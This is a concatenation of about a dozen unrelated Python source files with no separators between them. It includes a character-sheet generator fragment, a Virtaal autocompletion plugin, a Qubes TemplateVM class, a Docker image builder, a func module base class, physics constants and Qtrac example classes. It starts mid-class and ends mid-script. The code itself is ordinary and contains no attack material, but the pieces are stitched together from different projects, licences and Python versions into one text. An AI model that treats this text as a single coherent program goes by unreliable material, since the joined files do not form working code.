    def chargen(a, b, c, abia, abib, abic, shuffle, vamp=None, back=None):
        """
        Redirects to the charactersheet/ editor (if logged in) of a randomly
        generated character
        :param a: points to be allocated in the first attribute group
        :param b: points to be allocated in the second attribute group
        :param c: points to be allocated in the third attribute group
        :param abia: points to be allocated in the first ability group
        :param abib: points to be allocated in the second ability group
        :param abic: points to be allocated in the third ability group
        :param shuffle: if the first/second/third groups should be shuffled (each)
        :param vamp: if not None, character will be a vampire, int(vamp)
        is the amount of discipline points
        :param back: background points
        """
        try:
            attribute_points = [int(x) for x in (a, b, c)]
            ability_points = [int(x) for x in (abia, abib, abic)]
            char = VampireCharacter.makerandom(
                1, 5, *attribute_points, *ability_points, int(shuffle)
            )
            print(vamp)
            if vamp is not None:
                char.makevamprandom(vamp, back)
            print(char.getdictrepr())
            if session.get("logged_in", False):
                return render_template(
                    "vampsheet_editor.html",
                    character=char.getdictrepr(),
                    Clans=VampireCharacter.get_clans(),
                    Backgrounds=VampireCharacter.get_backgrounds(),
                    New=True,
                )
            return render_template("vampsheet.html", character=char.getdictrepr())
        except Exception as e:
            flash("ERROR" + "\n".join(e.args))
            raise

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2008-2010 Zuza Software Foundation
#
# This file is part of Virtaal.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.

"""Contains the AutoCompletor class."""

import gobject
import re
try:
    from collections import defaultdict
except ImportError:
    # Minimal stand-in for Python < 2.5: returns default_factory() for a
    # missing key but, unlike the real defaultdict, does NOT store the
    # generated default back into the mapping.
    class defaultdict(dict):
        def __init__(self, default_factory=lambda: None):
            self.__factory = default_factory

        def __getitem__(self, key):
            if key in self:
                return super(defaultdict, self).__getitem__(key)
            else:
                # Key absent: hand back a fresh default without inserting it.
                return self.__factory()

from virtaal.controllers.baseplugin import BasePlugin
from virtaal.views.widgets.textbox import TextBox


class AutoCompletor(object):
    """
    Does auto-completion of registered words in registered widgets.

    Words are collected (with frequencies) via add_words() and
    add_words_from_units(), and offered as completions in registered
    TextBox widgets once the typed prefix reaches comp_len characters.
    """

    # Splits text into words: any run of non-word characters is a separator.
    wordsep_re = re.compile(r'\W+', re.UNICODE)

    # Stop collecting words from units once this many distinct words are known.
    MAX_WORDS = 10000
    DEFAULT_COMPLETION_LENGTH = 4 # The default minimum length of a word that may
                                  # be auto-completed.

    def __init__(self, main_controller, word_list=None, comp_len=DEFAULT_COMPLETION_LENGTH):
        """Constructor.

            @type  word_list: list
            @param word_list: A list of words that should be auto-completed
                (default: an empty list).
            @type  comp_len: int
            @param comp_len: Minimum typed prefix length before completion
                is offered."""
        self.main_controller = main_controller
        # BUG FIX: the default used to be a shared mutable list ([]).
        if word_list is None:
            word_list = []
        assert isinstance(word_list, list)
        self.comp_len = comp_len
        self._word_list = []
        self._word_freq = defaultdict(lambda: 0)
        self.add_words(word_list)
        self.widgets = set()

    def add_widget(self, widget):
        """Add a widget to the list of widgets to do auto-completion for."""
        if widget in self.widgets:
            return # Widget already added

        if isinstance(widget, TextBox):
            self._add_text_box(widget)
            return

        raise ValueError("Widget type %s not supported." % (type(widget)))

    def add_words(self, words, update=True):
        """Add a word or words to the list of words to auto-complete.

            @param update: whether to re-sort the completion list afterwards
                (batch callers pass False and update once at the end)."""
        for word in words:
            if self.isusable(word):
                self._word_freq[word] += 1
        if update:
            self._update_word_list()

    def add_words_from_units(self, units):
        """Collect all words from the given translation units to use for
            auto-completion.

            @type  units: list
            @param units: The translation units to collect words from.
            """
        for unit in units:
            target = unit.target
            if not target:
                continue
            self.add_words(self.wordsep_re.split(target), update=False)
            if len(self._word_freq) > self.MAX_WORDS:
                break

        self._update_word_list()

    def autocomplete(self, word):
        """Return (full_word, remainder) for the most frequent known word
            starting with ``word``, or (None, u'') when there is none."""
        for w in self._word_list:
            if w.startswith(word):
                return w, w[len(word):]
        return None, u''

    def clear_widgets(self):
        """Release all registered widgets from the spell of auto-completion."""
        for w in set(self.widgets):
            self.remove_widget(w)

    def clear_words(self):
        """Remove all registered words; effectively turns off auto-completion."""
        # BUG FIX: these two assignments were swapped (the frequency dict got
        # a plain list and the word list a defaultdict), which made any
        # subsequent add_words() call fail.
        self._word_freq = defaultdict(lambda: 0)
        self._word_list = []

    def isusable(self, word):
        """Returns a value indicating if the given word should be kept as a
        suggestion for autocomplete."""
        return len(word) > self.comp_len + 2

    def remove_widget(self, widget):
        """Remove a widget (currently only L{TextBox}s are accepted) from
            the list of widgets to do auto-correction for.
            """
        if isinstance(widget, TextBox) and widget in self.widgets:
            self._remove_textbox(widget)

    def remove_words(self, words):
        """Remove a word or words from the list of words to auto-complete."""
        if isinstance(words, basestring):
            del self._word_freq[words]
            self._word_list.remove(words)
        else:
            for w in words:
                try:
                    del self._word_freq[w]
                    self._word_list.remove(w)
                except (KeyError, ValueError):
                    # BUG FIX: list.remove() raises ValueError (not KeyError)
                    # for a missing word; catch both so one absent word does
                    # not abort the batch removal.
                    pass

    def _add_text_box(self, textbox):
        """Add the given L{TextBox} to the list of widgets to do auto-
            correction on."""
        if not hasattr(self, '_textbox_insert_ids'):
            self._textbox_insert_ids = {}
        handler_id = textbox.connect('text-inserted', self._on_insert_text)
        self._textbox_insert_ids[textbox] = handler_id
        self.widgets.add(textbox)

    def _on_insert_text(self, textbox, text, offset, elem):
        """Offer a completion suggestion after a single-character insertion."""
        if not isinstance(text, basestring) or self.wordsep_re.match(text):
            return
        # We are only interested in single character insertions, otherwise we
        # react similarly for paste and similar events
        if len(text.decode('utf-8')) > 1:
            return

        prefix = unicode(textbox.get_text(0, offset) + text)
        postfix = unicode(textbox.get_text(offset))
        buffer = textbox.buffer

        # Quick fix to check that we don't autocomplete in the middle of a word.
        right_lim = len(postfix) > 0 and postfix[0] or ' '
        if not self.wordsep_re.match(right_lim):
            return

        lastword = self.wordsep_re.split(prefix)[-1]

        if len(lastword) >= self.comp_len:
            completed_word, word_postfix = self.autocomplete(lastword)
            if completed_word == lastword:
                return

            if completed_word:
                # Updating of the buffer is deferred until after this signal
                # and its side effects are taken care of. We abuse
                # gobject.idle_add for that.
                insert_offset = offset + len(text)
                def suggest_completion():
                    # Block our own handler so setting the suggestion does not
                    # re-enter this code path.
                    textbox.handler_block(self._textbox_insert_ids[textbox])
                    textbox.suggestion = {'text': word_postfix, 'offset': insert_offset}
                    textbox.handler_unblock(self._textbox_insert_ids[textbox])

                    sel_iter_start = buffer.get_iter_at_offset(insert_offset)
                    sel_iter_end   = buffer.get_iter_at_offset(insert_offset + len(word_postfix))
                    buffer.select_range(sel_iter_start, sel_iter_end)

                    return False

                gobject.idle_add(suggest_completion, priority=gobject.PRIORITY_HIGH)

    def _remove_textbox(self, textbox):
        """Remove the given L{TextBox} from the list of widgets to do
            auto-correction on.
            """
        if not hasattr(self, '_textbox_insert_ids'):
            return
        # Disconnect the "insert-text" event handler
        textbox.disconnect(self._textbox_insert_ids[textbox])

        self.widgets.remove(textbox)

    def _update_word_list(self):
        """Update and sort found words according to frequency."""
        # sorted() keeps this working on Python 3 too, where dict.items()
        # returns a view without a .sort() method.
        by_freq = sorted(self._word_freq.items(), key=lambda item: item[1], reverse=True)
        self._word_list = [word for word, _freq in by_freq]


class Plugin(BasePlugin):
    """Plug-in that wires an AutoCompletor up to the current store and the
    unit view's target text boxes."""

    description = _('Automatically complete long words while you type')
    display_name = _('AutoCompletor')
    version = 0.1

    # INITIALIZERS #
    def __init__(self, internal_name, main_controller):
        self.internal_name = internal_name
        self.main_controller = main_controller

        self._init_plugin()

    def _init_plugin(self):
        """Create the AutoCompletor and connect to store/unit-view signals."""
        from virtaal.common import pan_app  # NOTE(review): appears unused here
        self.autocomp = AutoCompletor(self.main_controller)

        self._store_loaded_id = self.main_controller.store_controller.connect('store-loaded', self._on_store_loaded)

        if self.main_controller.store_controller.get_store():
            # Connect to already loaded store. This happens when the plug-in is enabled after loading a store.
            self._on_store_loaded(self.main_controller.store_controller)

        self._unitview_id = None
        unitview = self.main_controller.unit_controller.view
        if unitview.targets:
            self._connect_to_textboxes(unitview, unitview.targets)
        else:
            # Targets not built yet; register them as soon as they appear.
            self._unitview_id = unitview.connect('targets-created', self._connect_to_textboxes)

    def _connect_to_textboxes(self, unitview, textboxes):
        """Register every target text box with the auto-completer."""
        for target in textboxes:
                self.autocomp.add_widget(target)

    # METHODS #
    def destroy(self):
        """Remove all signal-connections."""
        self.autocomp.clear_words()
        self.autocomp.clear_widgets()
        self.main_controller.store_controller.disconnect(self._store_loaded_id)
        if getattr(self, '_cursor_changed_id', None):
            self.store_cursor.disconnect(self._cursor_changed_id)
        if self._unitview_id:
            self.main_controller.unit_controller.view.disconnect(self._unitview_id)


    # EVENT HANDLERS #
    def _on_cursor_change(self, cursor):
        """Harvest words from the unit we are leaving, then remember the new one."""
        def add_widgets():
            # Collect completion words from the previously visited unit's
            # target(s), deferred to idle time to stay off the UI path.
            if hasattr(self, 'lastunit'):
                if self.lastunit.hasplural():
                    for target in self.lastunit.target:
                        if target:
                            self.autocomp.add_words(self.autocomp.wordsep_re.split(unicode(target)))
                else:
                    if self.lastunit.target:
                        self.autocomp.add_words(self.autocomp.wordsep_re.split(unicode(self.lastunit.target)))
            self.lastunit = cursor.deref()
        gobject.idle_add(add_widgets)

    def _on_store_loaded(self, storecontroller):
        """Seed the completer from the new store and track its cursor."""
        self.autocomp.add_words_from_units(storecontroller.get_store().get_units())

        # Re-wire the cursor-changed handler onto the new store's cursor.
        if hasattr(self, '_cursor_changed_id'):
            self.store_cursor.disconnect(self._cursor_changed_id)
        self.store_cursor = storecontroller.cursor
        self._cursor_changed_id = self.store_cursor.connect('cursor-changed', self._on_cursor_change)
        self._on_cursor_change(self.store_cursor)

#
# The Qubes OS Project, http://www.qubes-os.org
#
# Copyright (C) 2014-2016  Wojtek Porczyk <woju@invisiblethingslab.com>
# Copyright (C) 2016       Marek Marczykowski <marmarek@invisiblethingslab.com>)
# Copyright (C) 2016       Bahtiar `kalkin-` Gadimov <bahtiar@gadimov.de>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, see <https://www.gnu.org/licenses/>.
#

''' This module contains the TemplateVM implementation '''

import qubes
import qubes.config
import qubes.vm.qubesvm
import qubes.vm.mix.net
from qubes.config import defaults
from qubes.vm.qubesvm import QubesVM


class TemplateVM(QubesVM):
    '''Template for AppVM'''

    # Templates live under the dedicated templates directory.
    dir_path_prefix = qubes.config.system_path['qubes_templates_dir']

    @property
    def appvms(self):
        ''' Returns a generator containing all domains based on the current
            TemplateVM.
        '''
        for vm in self.app.domains:
            # Identity comparison: only VMs whose template *is* this object.
            if hasattr(vm, 'template') and vm.template is self:
                yield vm

    netvm = qubes.VMProperty('netvm', load_stage=4, allow_none=True,
        default=None,
        # pylint: disable=protected-access
        setter=qubes.vm.qubesvm.QubesVM.netvm._setter,
        doc='VM that provides network connection to this domain. When '
            '`None`, machine is disconnected.')

    def __init__(self, *args, **kwargs):
        # A template is the root of the template chain; it must not have one.
        assert 'template' not in kwargs, "A TemplateVM can not have a template"
        # Volume layout: root and private persist across shutdowns
        # (save_on_stop), volatile and kernel are scratch/read-only.
        self.volume_config = {
            'root': {
                'name': 'root',
                'snap_on_start': False,
                'save_on_stop': True,
                'rw': True,
                'source': None,
                'size': defaults['root_img_size'],
            },
            'private': {
                'name': 'private',
                'snap_on_start': False,
                'save_on_stop': True,
                'rw': True,
                'source': None,
                'size': defaults['private_img_size'],
                'revisions_to_keep': 0,
            },
            'volatile': {
                'name': 'volatile',
                'size': defaults['root_img_size'],
                'snap_on_start': False,
                'save_on_stop': False,
                'rw': True,
            },
            'kernel': {
                'name': 'kernel',
                'snap_on_start': False,
                'save_on_stop': False,
                'rw': False
            }
        }
        super(TemplateVM, self).__init__(*args, **kwargs)

    @qubes.events.handler('property-set:default_user',
                          'property-set:kernel',
                          'property-set:kernelopts',
                          'property-set:vcpus',
                          'property-set:memory',
                          'property-set:maxmem',
                          'property-set:qrexec_timeout',
                          'property-set:shutdown_timeout',
                          'property-set:management_dispvm')
    def on_property_set_child(self, _event, name, newvalue, oldvalue=None):
        """Send event about default value change to child VMs
           (which use default inherited from the template).

           This handler is supposed to be set for properties using
           `_default_with_template()` function for the default value.
           """
        if newvalue == oldvalue:
            return

        for vm in self.appvms:
            # Only notify VMs that actually inherit the default.
            if not vm.property_is_default(name):
                continue
            vm.fire_event('property-reset:' + name, name=name)

# Copyright (C) 2005, Giovanni Bajo
# Based on previous work under copyright (c) 2001, 2002 McMillan Enterprises, Inc.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA
import sys

def hook(mod):
    """Strip the long-gone 'strop' module from mod's import list
    (applies on every Python newer than 1.x)."""
    if sys.version[0] > '1':
        # Rebuild in place so existing references to mod.imports stay valid.
        mod.imports[:] = [entry for entry in mod.imports if entry[0] != 'strop']
    return mod

#!/usr/bin/env python3

import sys
import os
sys.path.append(os.path.realpath("."))

import unittest

import cleanstream
import tagger
import pretransfer
import transfer
import interchunk
import postchunk
import adaptdocx

if __name__ == "__main__":
    # Run every module's test suite from the script's own directory and
    # exit with the number of failed suites (clamped to the 8-bit range).
    os.chdir(os.path.dirname(__file__))
    modules = [
        tagger,
        pretransfer,
        transfer,
        interchunk,
        postchunk,
        adaptdocx,
        cleanstream,
    ]
    failures = 0
    for module in modules:
        suite = unittest.TestLoader().loadTestsFromModule(module)
        outcome = unittest.TextTestRunner(verbosity=2).run(suite)
        if not outcome.wasSuccessful():
            failures += 1
    sys.exit(min(failures, 255))

#!/usr/bin/python3

# @begin:license
#
# Copyright (c) 2015-2019, Benjamin Niemann <pink@odahoda.de>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @end:license

import logging
import random

from . import ipc_test_pb2
from . import ipc_test

logger = logging.getLogger(__name__)


class IPCPerfTest(ipc_test.IPCPerfTestBase):
    """IPC round-trip benchmarks driving run_test() with protobuf requests."""

    async def test_small_messages(self):
        # One tiny entry per request, many (5000) round trips.
        request = ipc_test_pb2.TestRequest()
        request.t.add(numerator=random.randint(0, 4), denominator=random.randint(1, 2))
        await self.run_test(request, 5000)

    async def test_large_messages(self):
        # 10000 entries per request; only 100 round trips since each is heavy.
        request = ipc_test_pb2.TestRequest()
        for _ in range(10000):
            request.t.add(numerator=random.randint(0, 4), denominator=random.randint(1, 2))
        await self.run_test(request, 100)

import glob
import fnmatch
import itertools
import logging
import os
import re
import six
import sys
import yaml

from .dockerfile import Dockerfile
from .image import ImageBuilder
from .config import Config


class Builder(object):
    """Discovers Dockerfiles from glob patterns in the configuration and
    builds images (resolving inter-image dependencies) through ImageBuilder
    instances."""

    def __init__(self, config=None, **kwds):
        """
        :param config: mapping with an 'images' list; when None a default
            Config matching 'docker/*' is used.
        :param kwds: extra keyword arguments forwarded to each ImageBuilder.
        """
        self.logger = logging.getLogger(type(self).__name__)
        self.kwds = kwds
        self.images = {}
        if config is None:
            config = Config()
            config.update(dict(
                images=[
                    {
                        'path': 'docker/*',
                    }
                ],
            ))
        self.patterns = []
        for image in config['images']:
            # When path is provided and globbed, Dockerfile refers to its location
            # When path is provided but not globbed, Dockerfile refers to the current path
            # When Dockerfile is provided and globbed, path must not be globbed, both
            # refer to the current directory
            path = image.get('path', None)
            dockerfile = image.get('Dockerfile', 'Dockerfile')
            name = image.get('name', None)

            if path is None:
                path = '.'

            if '*' in path:
                if '*' in dockerfile:
                    # BUG FIX: the original message lacked separating spaces
                    # between the concatenated string fragments ("canbe",
                    # "thesame").
                    raise ValueError('Ambiguity in your configuration for %r, globbing can '
                        'be done either in "Dockerfile" or "path" key but not both at the '
                        'same time' % image)

                dockerfile = os.path.join(path, dockerfile)
                # Turn the globbed location into a regex capturing the context path.
                path = re.compile(re.sub(r'^.*/([^*]*)$', r'(?P<path>.*)/\1', dockerfile))

            if name is None:
                name = dockerfile
            if '*' in name:
                # Raw strings avoid invalid escape sequences (e.g. '\*') in
                # the regex sources.
                start = re.sub(r'^([^*]*/|).*', r'^\1(?P<name>.*)', dockerfile)
                end = re.sub(r'^.*\*(?:|[^/]*)(/.*)$', r'\1$', dockerfile)
                name = re.compile(start + end)

            pattern = {
                'name': name,
                'path': path,
                'Dockerfile': dockerfile,
            }
            self.patterns.append(pattern)
        self.config = config

    def get_matching_pattern(self, pattern, name, path):
        """Return the value under key *name* in *pattern*: either the literal
        string, or the regex group *name* extracted from *path* (None when the
        regex does not match)."""
        pattern = pattern[name]
        if isinstance(pattern, six.string_types):
            return pattern
        else:
            match = pattern.match(path)
            if match:
                return match.group(name)
        return None

    def getImage(self, image_name):
        """Return (and cache) an ImageBuilder for *image_name*.

        :raises KeyError: when no configured pattern yields the image.
        """
        try:
            return self.images[image_name]
        except KeyError:
            self.logger.debug('image builder cache miss, try to find it')
            for img_cfg in self.patterns:
                for path in glob.glob(img_cfg['Dockerfile']):
                    found_image_name = self.get_matching_pattern(img_cfg, 'name', path)
                    context_path = self.get_matching_pattern(img_cfg, 'path', path)
                    if found_image_name == image_name:
                        image = ImageBuilder(image_name,
                            contextPath=context_path,
                            dockerfile=path,
                            tagResolver=self,
                            **self.kwds
                        )
                        self.images[image_name] = image
                        return image
        raise KeyError("Cannot find image %s" % image_name)

    def imageTag(self, imgName):
        """Return the build tag of an already-instantiated builder, else None."""
        imgBuilder = self.images.get(imgName, None)
        if imgBuilder:
            return imgBuilder.buildTag()
        return None

    def build(self, client, names=None, child_images=None):
        """Build *names* (a string or list of image names), building their
        buildable dependencies first and detecting dependency cycles.

        :param child_images: ancestor chain used for loop detection.
            BUG FIX: was a shared mutable default argument ([]).
        """
        if child_images is None:
            child_images = []
        if isinstance(names, six.string_types):
            names = [names]

        def iter_buildable_deps(name):
            """
            instantiates a builder for each image dependency
            does nothing when the image cannot be built
            """
            for dep_name, _ in self.getImage(name).imageDeps():
                try:
                    self.getImage(dep_name)
                    yield dep_name
                except KeyError:
                    continue

        for name in names:
            if name in child_images:
                raise RuntimeError("dependency loop detected, %s some how depends on itself %s" %
                    (name, ' -> '.join(child_images + [name]))
                )
            for dep_name in iter_buildable_deps(name):
                self.build(client, dep_name, child_images=child_images + [name])

        for name in names:
            self.getImage(name).build(client)

    def tag(self, client, tags, images, **kwds):
        """Apply *tags* (default: ['latest']) to each image in *images*."""
        if tags is None:
            tags = ['latest']
        for image in images:
            self.getImage(image).tag(client, tags, **kwds)

COMMAND_NAME='build'
def add_options(parser):
    """Register the 'build' sub-command's options on *parser*.

    Works with both argparse (add_argument) and optparse (add_option)
    parsers.
    """
    # NOTE: commonSetUp was imported here but never used; dropped.
    from . import addCommonOptions
    from .dockerfile import addDockerfileOptions
    from .image import addImageOptions
    try:
        add = parser.add_argument
    except AttributeError:
        # optparse compatibility
        add = parser.add_option
    add("image", nargs="*",
                      help="images to build")
    add("-t", "--tag", dest="tag", default=None, action='append',
                      help="tag(s) to be applied to the resulting image in case of success")
    add("--registry", dest="registry", default=[], action='append',
                      help="Registry on which the image should tagged (<registry>/<name>:<tag>)")
    addCommonOptions(parser)
    addDockerfileOptions(parser)
    addImageOptions(parser)

def main(argv=sys.argv, args=None):
    """
    Builds a list of images

    Parses *argv* when *args* is not supplied, then builds and tags the
    requested images against the local Docker daemon.
    """
    # BUG FIX: removed duplicated `from . import commonSetUp`, and the unused
    # local `import sys, os` / `import yaml` (sys/yaml are module-level).
    from docker import Client
    from . import commonSetUp
    if not args:
        import argparse
        parser = argparse.ArgumentParser()
        add_options(parser)
        args = parser.parse_args(argv[1:])
    commonSetUp(args)
    builder = Builder()
    builder.build(Client.from_env(), args.image)
    builder.tag(Client.from_env(), args.tag, args.image, registries=args.registry)

# Allow running this module directly as a script.
if __name__ == "__main__" :
    main()

##
## Copyright 2007, Red Hat, Inc
## see AUTHORS
##
## This software may be freely redistributed under the terms of the GNU
## general public license.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
##

import inspect

from func import logger
from func.config import read_config, BaseConfig
from func.commonconfig import FuncdConfig
from func.minion.func_arg import * #the arg getter stuff

class FuncModule(object):
    """Base class for func minion modules.

    Exposes all public methods of a subclass over RPC (see register_rpc)
    together with built-in introspection methods: version, API version,
    description, method listing and argument metadata.
    """

    # the version is meant to be overridden by subclasses
    version = "0.0.0"
    api_version = "0.0.0"
    description = "No Description provided"

    class Config(BaseConfig):
        # Per-module options; subclasses override this with real fields.
        pass

    def __init__(self):

        # Minion-wide configuration first, then per-module options.
        config_file = '/etc/func/minion.conf'
        self.config = read_config(config_file, FuncdConfig)
        self.__init_log()
        self.__base_methods = {
            # __'s so we don't clobber useful names
            "module_version" : self.__module_version,
            "module_api_version" : self.__module_api_version,
            "module_description" : self.__module_description,
            "list_methods"       : self.__list_methods,
            "get_method_args"    : self.__get_method_args,
        }
        self.__init_options()

    def __init_log(self):
        # Use the shared func logger.
        log = logger.Logger()
        self.logger = log.logger

    def __init_options(self):
        # Module config file is named after the concrete subclass.
        options_file = '/etc/func/modules/'+self.__class__.__name__+'.conf'
        self.options = read_config(options_file, self.Config)
        return

    def register_rpc(self, handlers, module_name):
        """Register this module's methods into *handlers* under
        ``module_name.method`` keys."""
        # add the internal methods, note that this means they
        # can get clobbered by subclass versions
        for meth in self.__base_methods:
            handlers["%s.%s" % (module_name, meth)] = self.__base_methods[meth]

        # register our module's handlers
        for name, handler in self.__list_handlers().items():
            handlers["%s.%s" % (module_name, name)] = handler

    def __list_handlers(self):
        """ Return a dict of { handler_name, method, ... }.
        All methods that do not begin with an underscore will be exposed.
        We also make sure to not expose our register_rpc method.
        """
        handlers = {}
        for attr in dir(self):
            if self.__is_public_valid_method(attr):
                handlers[attr] = getattr(self, attr)
        return handlers

    def __list_methods(self):
        # NOTE: Python 2 only -- relies on dict.keys() returning lists.
        return self.__list_handlers().keys() + self.__base_methods.keys()

    def __module_version(self):
        """Return the module's version string."""
        return self.version

    def __module_api_version(self):
        """Return the module's API version string."""
        return self.api_version

    def __module_description(self):
        """Return the module's human-readable description."""
        return self.description

    def __is_public_valid_method(self,attr):
        # A method is exposed when it has no leading underscore and is not
        # one of the registration helpers themselves.
        if inspect.ismethod(getattr(self, attr)) and attr[0] != '_' and\
                attr != 'register_rpc' and attr!='register_method_args':
                    return True
        return False

    def __get_method_args(self):
        """
        Gets arguments with their formats according to ArgCompatibility
        class' rules.

        @return : dict with args or Raise Exception if something wrong
        happens
        """
        tmp_arg_dict = self.register_method_args()

        #if it is not implemented then return empty stuff 
        if not tmp_arg_dict:
            return {}

        #see if user tried to register a not implemented method :)
        for method in tmp_arg_dict.iterkeys():
            if not hasattr(self,method):
                raise NonExistingMethodRegistered("%s is not in %s "%(method,self.__class__.__name__))
        
        #create argument validation instance
        self.arg_comp = ArgCompatibility(tmp_arg_dict)
        #see if all registered arguments are there
        for method in tmp_arg_dict.iterkeys():
            self.arg_comp.is_all_arguments_registered(self,method,tmp_arg_dict[method]['args'])
        #see if the options that were used are OK..
        self.arg_comp.validate_all()

        return tmp_arg_dict 

    def register_method_args(self):
        """
        That is the method where users should override in their
        modules according to be able to send their method arguments
        to the Overlord. If they dont have it nothing breaks
        just that one in the base class is called

        @return : empty {}
        """

        # to know they didnt implement it
        return {}
    

import math as mth
import numpy as np

#----------------------
# J Matthews, 21/02
# This is a file containing useful constants for python coding
#
# Units in CGS unless stated
#
# Cleanup: removed the duplicate HEV assignment (it appeared twice with the
# same value) and the commented-out duplicates of H, C and BOLTZMANN, which
# are all defined below.
#----------------------

VERY_BIG = 1e50                # effectively infinity

H = 6.6262e-27                 # Planck's constant (erg s)
HC = 1.98587e-16               # Planck's constant * speed of light
HEV = 4.13620e-15              # Planck's constant in eV
HRYD = 3.04005e-16             # NSH 1204 Planck's constant in Rydberg
C = 2.997925e10                # speed of light (cm/s)
G = 6.670e-8                   # gravitational constant
BOLTZMANN = 1.38062e-16        # Boltzmann constant (erg/K)
WIEN = 5.879e10                # NSH 1208 Wien Disp Const in frequency units
H_OVER_K = 4.799437e-11
STEFAN_BOLTZMANN = 5.6696e-5
THOMPSON = 0.66524e-24         # Thomson cross-section (cm^2)
PI = 3.1415927
MELEC = 9.10956e-28            # electron mass (g)
E = 4.8035e-10                 # Electric charge in esu
MPROT = 1.672661e-24           # proton mass (g)
MSOL = 1.989e33                # solar mass (g)
PC = 3.08e18                   # parsec (cm)
YR = 3.1556925e7               # year (s)
PI_E2_OVER_MC = 0.02655103     # Classical cross-section
PI_E2_OVER_M = 7.96e8
ALPHA = 7.297351e-3            # Fine structure constant
BOHR = 0.529175e-8             # Bohr radius
CR = 3.288051e15               # Rydberg frequency for H != Ryd freq for infinite mass
ANGSTROM = 1.e-8               # Definition of an Angstrom in units of this code, e.g. cm
EV2ERGS = 1.602192e-12
RADIAN = 57.29578
RYD2ERGS = 2.1798741e-11


# NOTE(review): PARSEC differs slightly from PC above (3.086e18 vs 3.08e18);
# kept both for backward compatibility -- confirm which is intended.
PARSEC = 3.086E18

def format_path(path):
	"""Collapse every run of repeated '/' separators in *path* to one '/'.

	The parameter was renamed from ``str``, which shadowed the builtin.
	"""
	# Repeated replacement handles runs of any length ('a///b' -> 'a/b').
	while '//' in path:
		path = path.replace('//', '/')
	return path

#!/usr/bin/env python3
# Copyright (c) 2008-9 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License, or
# version 3 of the License, or (at your option) any later version. It is
# provided for educational purposes and is distributed in the hope that
# it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License for more details.

"""Provides the Item example classes.
"""

class Item(object):
    """A collected artwork with an artist, a title, and an optional year."""

    def __init__(self, artist, title, year=None):
        self.__artist = artist
        self.__title = title
        self.__year = year

    def artist(self):
        """Return the artist's name."""
        return self.__artist

    def setArtist(self, artist):
        """Replace the artist's name."""
        self.__artist = artist

    def title(self):
        """Return the work's title."""
        return self.__title

    def setTitle(self, title):
        """Replace the work's title."""
        self.__title = title

    def year(self):
        """Return the year, or None if unknown."""
        return self.__year

    def setYear(self, year):
        """Replace the year."""
        self.__year = year

    def __str__(self):
        suffix = "" if self.__year is None else " in {0}".format(self.__year)
        return "{0} by {1}{2}".format(self.__title, self.__artist, suffix)


class Painting(Item):
    """An Item that is a painting; adds nothing beyond the base class."""

    def __init__(self, artist, title, year=None):
        super().__init__(artist, title, year)


class Sculpture(Item):
    """An Item with an optional material (e.g. bronze, plaster)."""

    def __init__(self, artist, title, year=None, material=None):
        super().__init__(artist, title, year)
        self.__material = material

    def material(self):
        """Return the material, or None if unknown."""
        return self.__material

    def setMaterial(self, material):
        """Replace the material."""
        self.__material = material

    def __str__(self):
        base = super().__str__()
        if self.__material is None:
            return base
        return "{0} ({1})".format(base, self.__material)


class Dimension(object):
    """Width/height/depth of an item; depth is None for two-dimensional works.

    area() and volume() are abstract: subclasses must override them.
    """

    def __init__(self, width, height, depth=None):
        self.__width = width
        self.__height = height
        self.__depth = depth

    def width(self):
        return self.__width

    def setWidth(self, width):
        self.__width = width

    def height(self):
        return self.__height

    def setHeight(self, height):
        self.__height = height

    def depth(self):
        return self.__depth

    def setDepth(self, depth):
        self.__depth = depth

    def area(self):
        # BUG FIX: `raise NotImplemented` raised a TypeError (NotImplemented
        # is a sentinel value, not an exception class); NotImplementedError
        # is the correct exception for an abstract method.
        raise NotImplementedError()

    def volume(self):
        raise NotImplementedError()



if __name__ == "__main__":
    # Demo: print a small mixed collection and count sculpture materials.
    items = [
        Painting("Cecil Collins", "The Poet", 1941),
        Painting("Cecil Collins", "The Sleeping Fool", 1943),
        Painting("Edvard Munch", "The Scream", 1893),
        Painting("Edvard Munch", "The Sick Child", 1896),
        Painting("Edvard Munch", "The Dance of Life", 1900),
        Sculpture("Auguste Rodin", "Eternal Springtime", 1917, "plaster"),
        Sculpture("Auguste Rodin", "Naked Balzac", 1917, "plaster"),
        Sculpture("Auguste Rodin", "The Secret", 1925, "bronze"),
    ]
